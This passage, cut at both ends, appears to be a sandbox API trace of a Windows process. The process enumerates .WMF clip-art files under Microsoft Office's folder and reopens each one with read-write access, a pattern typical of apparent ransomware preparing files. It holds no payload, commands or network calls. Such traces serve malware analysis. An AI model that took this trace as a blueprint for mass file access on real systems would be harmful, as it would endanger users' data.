ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b2e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ED00184_.WMF", cAlternateFileName="")) returned 1 [0104.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00184_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.247] GetFileType (hFile=0x33c) returned 0x1 [0104.247] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.247] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.247] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.247] CloseHandle (hObject=0x33c) returned 1 [0104.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.247] GetFileType (hFile=0x33c) returned 0x1 [0104.247] CloseHandle (hObject=0x33c) returned 1 [0104.247] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00184_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b2e)) returned 1 [0104.247] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3670, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="EN00006_.WMF", cAlternateFileName="")) returned 1 [0104.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00006_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.248] GetFileType (hFile=0x33c) returned 0x1 [0104.248] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.248] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.248] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.249] CloseHandle (hObject=0x33c) returned 1 [0104.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00006_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.249] GetFileType (hFile=0x33c) returned 0x1 [0104.249] CloseHandle (hObject=0x33c) returned 1 [0104.249] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00006_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3670)) returned 1 [0104.249] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b1a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="EN00202_.WMF", cAlternateFileName="")) returned 1 [0104.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00202_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.250] GetFileType (hFile=0x33c) returned 0x1 [0104.250] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.250] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.250] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.250] CloseHandle (hObject=0x33c) returned 1 [0104.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00202_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.250] GetFileType (hFile=0x33c) returned 0x1 [0104.250] CloseHandle (hObject=0x33c) returned 1 [0104.251] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00202_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b1a)) returned 1 [0104.251] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3044, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="EN00222_.WMF", cAlternateFileName="")) returned 1 [0104.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00222_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.251] GetFileType (hFile=0x33c) returned 0x1 [0104.251] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.251] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.251] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.251] CloseHandle (hObject=0x33c) returned 1 [0104.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00222_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.252] GetFileType (hFile=0x33c) returned 0x1 [0104.252] CloseHandle (hObject=0x33c) returned 1 [0104.252] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00222_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3044)) returned 1 [0104.252] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a7c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="EN00242_.WMF", cAlternateFileName="")) returned 1 [0104.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00242_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.252] GetFileType (hFile=0x33c) returned 0x1 [0104.252] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.253] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.253] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.253] CloseHandle (hObject=0x33c) returned 1 [0104.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.253] GetFileType (hFile=0x33c) returned 0x1 [0104.253] CloseHandle (hObject=0x33c) returned 1 [0104.253] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00242_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a7c)) returned 1 [0104.253] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8e8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="EN00319_.WMF", cAlternateFileName="")) returned 1 [0104.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00319_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.253] GetFileType (hFile=0x33c) returned 0x1 [0104.253] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.254] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.254] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.254] CloseHandle (hObject=0x33c) returned 1 [0104.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00319_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.254] GetFileType (hFile=0x33c) returned 0x1 [0104.254] CloseHandle (hObject=0x33c) returned 1 [0104.254] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00319_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8e8)) returned 1 [0104.254] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="EN00320_.WMF", cAlternateFileName="")) returned 1 [0104.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00320_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.255] GetFileType (hFile=0x33c) returned 0x1 [0104.255] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.255] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.255] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.256] CloseHandle (hObject=0x33c) returned 1 [0104.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00320_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.256] GetFileType (hFile=0x33c) returned 0x1 [0104.256] CloseHandle (hObject=0x33c) returned 1 [0104.256] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00320_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e0)) returned 1 [0104.256] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x439c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="EN00397_.WMF", cAlternateFileName="")) returned 1 [0104.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00397_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.257] GetFileType (hFile=0x33c) returned 0x1 [0104.257] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.257] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.257] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.257] CloseHandle (hObject=0x33c) returned 1 [0104.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00397_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.257] GetFileType (hFile=0x33c) returned 0x1 [0104.257] CloseHandle (hObject=0x33c) returned 1 [0104.257] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00397_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc2f4b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x439c)) returned 1 [0104.258] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f08, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="EN00902_.WMF", cAlternateFileName="")) returned 1 [0104.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00902_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0104.258] GetFileType (hFile=0x33c) returned 0x1 [0104.259] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0104.259] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0104.259] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0104.259] CloseHandle (hObject=0x33c) returned 1 [0104.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft 